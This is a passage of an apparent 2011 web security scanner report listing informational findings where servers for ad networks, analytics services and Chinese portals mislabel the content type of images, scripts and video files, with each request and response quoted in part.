X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Date: Mon, 15 Aug 2011 18:56:02 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@..dZ.....width.@^........height.@d.......videodatarate.@.p......    framerate.@.........videocodecid.@.........canSeekToEnd....    ......3..........    on
...[SNIP]...

20.12. http://content.pop6.com/banners/aff/35057_R/120x160/120x160_marry.flv  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pop6.com
Path:   /banners/aff/35057_R/120x160/120x160_marry.flv

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /banners/aff/35057_R/120x160/120x160_marry.flv HTTP/1.1
Host: content.pop6.com
Proxy-Connection: keep-alive
Referer: http://content.pop6.com/banners/aff/piclist/video_piclist/35057/120x160R/R_marry_120x160.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 14 Dec 2010 17:27:53 GMT
ETag: "13828c1f-4f8c0-4976223f9b840"
Accept-Ranges: bytes
Content-Length: 325824
Content-Type: text/plain; charset=UTF-8
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Date: Mon, 15 Aug 2011 18:56:02 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@....l.D..width.@^........height.@d.......videodatarate.@.p......    framerate.@.........videocodecid.@.........canSeekToEnd....    ......-..........    on
...[SNIP]...

20.13. http://count36.51yes.com/click.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://count36.51yes.com
Path:   /click.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /click.aspx?id=360217262&logo=12 HTTP/1.1
Host: count36.51yes.com
Proxy-Connection: keep-alive
Referer: http://lifeng.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:49:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=gb2312
Content-Length: 1694


function y_gVal(iz)
{var endstr=document.cookie.indexOf(";",iz);if(endstr==-1) endstr=document.cookie.length;return document.cookie.substring(iz,endstr);}
function y_g(name)
{var arg=name+"=";var
...[SNIP]...

20.14. http://faxin.soso.com/scripts/gift.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://faxin.soso.com
Path:   /scripts/gift.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /scripts/gift.js HTTP/1.1
Host: faxin.soso.com
Proxy-Connection: keep-alive
Referer: http://www.soso.com/q?pid=s.idx&w=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_pvid=9085923014; pgv_flv=10.3 r183; pgv_info=pgvReferrer=&ssid=s8020529487

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 15 Aug 2011 18:25:44 GMT
Content-Type: application/x-javascript
Last-Modified: Thu, 11 Aug 2011 08:28:12 GMT
Connection: keep-alive
Expires: Mon, 15 Aug 2011 20:25:44 GMT
Cache-Control: max-age=7200
Content-Length: 6223

(function(){var b={j:function(a){a=a?" .chatBox { position:absolute; left:388px; top:25px; z-index:999; } .giftBox, .giftHover { background: url(http://cache.soso.com/30d/img/web/giftbox_2.png) no-rep
...[SNIP]...

20.15. http://hs.interpolls.com/cache/lionsgate/conan/300/inter_50.poll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hs.interpolls.com
Path:   /cache/lionsgate/conan/300/inter_50.poll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /cache/lionsgate/conan/300/inter_50.poll HTTP/1.1
Host: hs.interpolls.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
ETag: "166d9ed034caf5a2f5fde7968bdf0814:1312497417"
Vary: Accept-Encoding
Expires: Mon, 15 Aug 2011 18:24:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:24:04 GMT
Content-Length: 26772
Connection: close

//////////////////////////////////////////////////////
// Interpolls Banner Unit
// Size: 300x250
// Type: in-page
// Base: 1.2
// Category: Media & Entertainment, Theatrical
//
// Copyright (
...[SNIP]...

20.16. http://hs.interpolls.com/evt.poll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hs.interpolls.com
Path:   /evt.poll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /evt.poll?a=71162&c=50&p=1&e=9101&rndStr=396699743 HTTP/1.1
Host: hs.interpolls.com
Proxy-Connection: keep-alive
Referer: http://hs.interpolls.com/creative/6/6/1cgk.swf?inPhase=2&inSiteID=0&inCDN=InterpollsAkamai&inA=71162&inC=50&inP=1&inD=www.imdb.com&inUid=window.ipollGObj_2_261['lionsgate/conan/300'].i5267495
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 47
Content-Type: text/plain
ETag: "a15b1b920f6334a37ca1cd4632593e40:1156882223"
Vary: Accept-Encoding
Cache-Control: max-age=249
Date: Mon, 15 Aug 2011 18:24:07 GMT
Connection: close

GIF89a.............!.......,...........D..;


20.17. http://hs.interpolls.com/imprimage.poll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hs.interpolls.com
Path:   /imprimage.poll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /imprimage.poll?a=71162&c=50&p=1&t=9&i=0&rnd=512818204704672100 HTTP/1.1
Host: hs.interpolls.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 47
Content-Type: text/plain
ETag: "88f7b34f243608e0161a97fa453a3b31:1156882225"
Vary: Accept-Encoding
Cache-Control: max-age=796
Date: Mon, 15 Aug 2011 18:24:04 GMT
Connection: close

GIF89a.............!.......,...........D..;


20.18. http://hs.interpolls.com/ts1.poll  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://hs.interpolls.com
Path:   /ts1.poll

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /ts1.poll?a=71162&c=50&p=1&uid=512818204704672100&ts=1313414700721&b=1&rndStr=64296364481568625359486322 HTTP/1.1
Host: hs.interpolls.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 43
Content-Type: text/plain
ETag: "76b044162c27356de8fe37b081f3b1c5:1242428716"
Vary: Accept-Encoding
Cache-Control: max-age=620
Date: Mon, 15 Aug 2011 18:24:06 GMT
Connection: close

GIF89a.............!.......,...........D..;

20.19. http://i.cdn.turner.com/money/fn_adspaces/creatives/2009/10/14/352812cnnm_twitter_10.12.09_336x280.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://i.cdn.turner.com
Path:   /money/fn_adspaces/creatives/2009/10/14/352812cnnm_twitter_10.12.09_336x280.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /money/fn_adspaces/creatives/2009/10/14/352812cnnm_twitter_10.12.09_336x280.gif HTTP/1.1
Host: i.cdn.turner.com
Proxy-Connection: keep-alive
Referer: http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2724B495051D2BCC-400001066000279F[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:27 GMT
Expires: Mon, 15 Aug 2011 19:40:48 GMT
Last-Modified: Fri, 04 Dec 2009 21:43:02 GMT
Cache-Control: max-age=3600
Content-Type: image/gif
Accept-Ranges: bytes
Server: Apache
Content-Length: 18401

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................P..
...[SNIP]...

20.20. http://ipr.cntv.cn/library/column/2011/07/08/C30796/base.css  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ipr.cntv.cn
Path:   /library/column/2011/07/08/C30796/base.css

Issue detail

The response contains the following Content-type statement:The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /library/column/2011/07/08/C30796/base.css HTTP/1.1
Host: ipr.cntv.cn
Proxy-Connection: keep-alive
Referer: http://ipr.cntv.cn/english/no1/index.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Sat, 09 Jul 2011 12:00:15 GMT
ETag: "b60ebc-245b-4a7a1b16ca7c0"
Accept-Ranges: bytes
X-UA-Compatible: IE=EmulateIE7
Content-Length: 9307
Content-Type: text/css
Cache-Control: max-age=550
Expires: Mon, 15 Aug 2011 18:46:49 GMT
Date: Mon, 15 Aug 2011 18:37:39 GMT
Connection: close
Vary: Accept-Encoding

@charset "utf-8";

body, div, p, ul, ol, dl, dt, dd, li, form, input, table, img,
h1, h2, h3, h4, h5, h6{margin:0; padding:0;}

body{
background:#fff none; color:#333; font-size:12px; font-styl
...[SNIP]...

20.21. http://js.mail.sohu.com/passport/pi18030.201011300952.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.mail.sohu.com
Path:   /passport/pi18030.201011300952.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /passport/pi18030.201011300952.js HTTP/1.1
Host: js.mail.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Connection: keep-alive
Server: nginx/0.7.65
Date: Sun, 24 Jul 2011 08:59:30 GMT
Last-Modified: Tue, 30 Nov 2010 01:52:14 GMT
Expires: Sat, 22 Oct 2011 08:59:30 GMT
Cache-Control: max-age=7776000
FSS-Cache: HIT from 3805485.5968183.4789070
Content-Length: 14086

function changebg(A){if(A==1){getObject("pCardOpen").className="open hidden";getObject("pCardClose").className="close";PassportSC.cElement.className="passportc";PassportSC.cElement.style.display="bloc
...[SNIP]...

20.22. http://js.sohu.com/passport/pp18030_31.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.sohu.com
Path:   /passport/pp18030_31.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /passport/pp18030_31.js HTTP/1.1
Host: js.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Connection: keep-alive
Date: Mon, 15 Aug 2011 09:21:06 GMT
Server: SWS
Vary: Accept-Encoding
Cache-Control: max-age=43200
Expires: Mon, 15 Aug 2011 21:21:06 GMT
Last-Modified: Sat, 10 Jul 2010 04:49:46 GMT
Content-Length: 33967
FSS-Cache: HIT from 30474881.37290817.41507817
Accept-Ranges: bytes

var hexcase=0;var chrsz=8;function hex_md5(A){return binl2hex(core_md5(str2binl(A),A.length*chrsz))}function core_md5(K,F){K[F>>5]|=128<<((F)%32);K[(((F+64)>>>9)<<4)+14]=F;var J=1732584193;var I=-2717
...[SNIP]...

20.23. http://js.tudouui.com/js/page/index/v2/userInfo_11.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://js.tudouui.com
Path:   /js/page/index/v2/userInfo_11.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/page/index/v2/userInfo_11.js HTTP/1.1
Host: js.tudouui.com
Proxy-Connection: keep-alive
Referer: http://www.tudou.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Last-Modified: Wed, 10 Aug 2011 10:14:37 GMT
ETag: "396278141"
Content-Type: application/x-javascript
Expires: Sat, 07 Aug 2021 10:22:05 GMT
Cache-Control: max-age=315359913
X-Cache: HIT
Content-Length: 34100
Date: Mon, 15 Aug 2011 18:56:04 GMT
Server: lighttpd

TUI.ns("TUI.accessor",function(f){f=f||{};var e=f.data||{},d=f.event||new TUI.eventClass(),c,g=f.set||function(i,h){return e[i]=h},b=f.get||function(h){return e[h]};function a(){e={};if(f.data){f.data
...[SNIP]...

20.24. http://myseofriend.net/myseofriendlog.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://myseofriend.net
Path:   /myseofriendlog.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /myseofriendlog.php?page_url=aHR0cDovL3d3dy56ZWRvLmNvbS8=&page_title=WkVETyBBZHZlcnRpc2luZyBUZWNobm9sb2d5IFBhcnRuZXI=&event_type=YmFzZS5wYWdlX3JlcXVlc3Q=&site_id=ZDFjOTFhODc2OWZiZGRlNWEyOTRmZjgxMGY5NjBkZDA=&startTime=MTMxMzQzNDU5NA==&referrer=&search_referer=&currTime=MTMxMzQzNDU5NA==&&backlink=1&pageview=1&paidvisit=0 HTTP/1.1
Host: myseofriend.net
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:55:40 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Length: 346
Content-Type: text/html


Warning: mysql_connect(): Host 'ec2-50-19-253-119.compute-1.amazonaws.com' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts' in /mnt/docroot/myseofriend.net/config.p
...[SNIP]...

20.25. http://news.soso.com/js/filter_dev.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://news.soso.com
Path:   /js/filter_dev.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/filter_dev.js HTTP/1.1
Host: news.soso.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_flv=10.3 r183; pid=s.idx; pgv_pvid=9085923014; pgv_info=pgvReferrer=&ssid=s8020529487; ip=0; cookie=0; name=12612374529663113019270038729854; querytext=xss

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:27:03 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Wed, 11 May 2011 12:06:38 GMT
Expires: Mon, 15 Aug 2011 20:27:03 GMT
Cache-Control: max-age=7200
Content-Length: 4070

var cookieOptions = {};
cookieOptions.expires = 2*365;
cookieOptions.path = '/';
cookieOptions.domain = 'soso.com';
cookieOptions.secure = false;

$(document).ready(function (){
var str = "http://
...[SNIP]...

20.26. http://news.soso.com/js/img_smartbox.dev.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://news.soso.com
Path:   /js/img_smartbox.dev.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/img_smartbox.dev.js HTTP/1.1
Host: news.soso.com
Proxy-Connection: keep-alive
Referer: http://news.soso.com/n.q?cf=web&ch=web.cf.news&pid=web.cf&ie=utf-8&w=xss&sd=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: suid=6067540526; pgv_flv=10.3 r183; pid=s.idx; pgv_pvid=9085923014; pgv_info=pgvReferrer=&ssid=s8020529487; ip=0; cookie=0; name=12612374529663113019270038729854; querytext=xss

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:27:24 GMT
Content-Type: application/x-javascript
Connection: keep-alive
Last-Modified: Thu, 25 Nov 2010 14:17:05 GMT
Expires: Mon, 15 Aug 2011 20:27:24 GMT
Cache-Control: max-age=7200
Content-Length: 18346

function realEscape(str) {
   return escape(str).replace(/(%[8-9,A-F][0-9,A-F]|(%u[0-9,A-F]{4}))/g, function($1) {return unescape($1);}).replace(/\+/g, "%2B").replace(/\//g, "%2F");
}
(function() {

...[SNIP]...

20.27. http://now.eloqua.com/visitor/v200/svrGP.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a GIF image.

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1795&ref2=http://www.redhat.com/&tzo=360&ms=323 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.redhat.com/products/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=1A97B82F8A23464F9D7A7339E98EF168; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Mon, 15 Aug 2011 19:05:49 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

20.28. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&id=4c8235243e&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.112%20safari%2F535.1&x=1313434020454&c=0&t=0&v=0&m=0&vn=2.0.4&nv=0&pv=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=9532635152fbdebd

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=9532635152fbdebd; Domain=.crowdscience.com; expires=Sun, 13 Nov 2011 18:46:04; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c5b0255e4fc310b1;path=/';
document.cookie = '__csv=9532635152fbdebd|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('968b71d8793729f4'!='1'
...[SNIP]...

20.29. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=25273&siteId=25281&adId=19972&kadwidth=728&kadheight=90&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://bpx.a9.com/amzn/iframe.html&frameName=http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281&kltstamp=2011-7-15%2013%3A25%3A48&ranreq=0.6436679325997829&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://bpx.a9.com/amzn/iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; PMAT=3q-k0P8Dtv2EXGCX1i1A78OKit3cfn3wmuA3v835o1Qpm1MfmPT2Wcg; PUBMDCID=1; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; PMDTSHR=cat:; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1723
Date: Mon, 15 Aug 2011 18:26:04 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 14-Aug-2012 18:26:03 GMT; path=/
Set-Cookie: pubfreq_25281_19972_1780682826=661-1; domain=pubmatic.com; expires=Mon, 15-Aug-2011 19:06:04 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 16-Aug-2011 18:26:04 GMT; path=/

document.write('<div id="http_bpx_a9_comamzniframe_htmlkomli_ads_frame12527325281" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=uWIAAMFiAAAET
...[SNIP]...

20.30. http://sp.ask.com/sh/i/a14/favicon/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sp.ask.com
Path:   /sh/i/a14/favicon/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /sh/i/a14/favicon/favicon.ico HTTP/1.1
Host: sp.ask.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjAyLVVUQw%3D%3D&po=0&pp=dir; qc=0

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix)
Last-Modified: Tue, 17 Aug 2010 23:26:25 GMT
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Date: Mon, 15 Aug 2011 18:24:16 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

20.31. http://static.youku.com/v1.0.0687/index/js/common.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://static.youku.com
Path:   /v1.0.0687/index/js/common.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /v1.0.0687/index/js/common.js HTTP/1.1
Host: static.youku.com
Proxy-Connection: keep-alive
Referer: http://www.youku.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 30 Jul 2014 18:48:52 GMT
Cache-Control: max-age=93312000
Vary: Accept-Encoding
